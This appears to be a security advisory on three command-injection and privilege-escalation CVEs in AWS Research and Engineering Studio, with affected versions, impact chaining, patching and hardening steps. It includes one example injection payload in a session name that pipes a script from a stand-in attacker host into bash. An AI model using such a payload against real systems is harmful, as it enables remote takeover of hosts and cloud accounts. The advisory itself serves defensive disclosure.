AWS disclosed three high-severity vulnerabilities in Research and Engineering Studio (RES) on April 6, 2026, all carrying CVSS scores of 8.8. The bugs allow any authenticated user to escalate to root on virtual desktop hosts, hijack the instance profile to pivot into other AWS services, or execute arbitrary commands on the cluster manager. If you run RES in any version from 2024.10 through 2025.12.01, stop reading and start patching.

What Is AWS RES?

Research and Engineering Studio is AWS’s managed environment for spinning up HPC and virtual desktop infrastructure. It handles Linux and Windows virtual desktops, shared storage, job scheduling, and user session management — all backed by EC2 instances, DCV connections, and a central cluster-manager service. It’s popular in research labs, financial modeling shops, and engineering orgs that need on-demand compute with centralized admin.

The attack surface matters here: RES is by design multi-tenant and internet-facing, with authenticated researchers interacting through APIs and web consoles. A command injection at this layer gives an attacker lateral movement across the entire RES environment.

The Vulnerabilities

CVE-2026-5707 — Root RCE via Crafted Session Name (CVSS 8.8)

The virtual desktop session creation endpoint passes user-supplied session names directly into OS commands without sanitization. An authenticated user can inject shell metacharacters into the session name field, achieving arbitrary command execution as root on the virtual desktop host EC2 instance.

The root cause is textbook CWE-78 (OS Command Injection): the session name string gets interpolated into a shell command, likely through string concatenation rather than parameterized execution. Exploitation is trivial — a session name like test$(curl attacker.com/shell.sh|bash) would suffice.

Affected versions: 2025.03 through 2025.12.01

CVE-2026-5708 — Privilege Escalation via Unsanitized Session Attributes (CVSS 8.8)

The session creation API also fails to validate user-modifiable attributes beyond just the session name. An authenticated user can craft API requests that manipulate session attributes to assume the Virtual Desktop Host’s EC2 instance profile permissions. This means an attacker can interact with any AWS service the instance profile has access to — S3 buckets, DynamoDB tables, Secrets Manager, other EC2 instances, whatever IAM allows.

This is the more dangerous bug in environments with broadly-scoped instance profiles, which is most of them. The blast radius extends well beyond RES into whatever AWS resources the host can reach.

Affected versions: Prior to 2026.03

CVE-2026-5709 — Command Injection via FileBrowser API (CVSS 8.8)

The FileBrowser List Files API endpoint takes file path parameters and passes them to shell commands without sanitization. An authenticated user can inject shell metacharacters into the file path, executing arbitrary commands on the cluster-manager EC2 instance.

Unlike CVE-2026-5707 which targets virtual desktop hosts, this one hits the cluster manager — the central control plane for the entire RES deployment. Compromising the cluster manager means owning the whole environment.

Affected versions: 2024.10 through 2025.12.01

Impact Assessment

All three bugs require authentication, but “authenticated” in a research computing context often means “anyone with a university email” or “any contractor in the org.” The barrier is low.

The combination is particularly nasty:

  • CVE-2026-5709 gets you code execution on the cluster manager (control plane)
  • CVE-2026-5707 gets you root on any virtual desktop host (compute plane)
  • CVE-2026-5708 lets you pivot from RES into the broader AWS account via instance profile hijacking

Chained together, an attacker with basic RES user credentials can own the entire RES deployment and then move laterally into the AWS account. In environments running sensitive research workloads — defense, pharma, financial modeling — this is a critical exposure.

There is no evidence of active exploitation in the wild yet, but these bugs are trivially exploitable and proof-of-concept details are effectively public via the GitHub issue tracker.

Mitigation

Upgrade to RES 2026.03. This is the only complete fix and addresses all three CVEs.

If you cannot upgrade immediately, AWS has released backport patches for versions 2025.12.01, 2025.12, 2025.09, 2025.06.01, 2025.06, and 2025.03. Apply the patch script and recycle affected instances.

Additional hardening steps:

  1. Audit instance profiles attached to RES virtual desktop hosts and the cluster manager. Apply least-privilege IAM policies. If your instance profile has s3:* or ec2:*, now is the time to scope it down.
  2. Review RES user access. Remove any accounts that no longer need access. Tighten authentication requirements.
  3. Check CloudTrail for unusual API calls originating from RES EC2 instances, particularly AssumeRole, GetSessionToken, or calls to services your RES workloads don’t normally touch.
  4. Monitor the cluster manager for unexpected processes, outbound connections, or file modifications.

Timeline

  • March 10, 2026: Issue filed on the aws/res GitHub repository
  • March 26, 2026: Fix merged in RES 2026.03
  • April 6, 2026: CVE-2026-5707, CVE-2026-5708, and CVE-2026-5709 publicly disclosed

References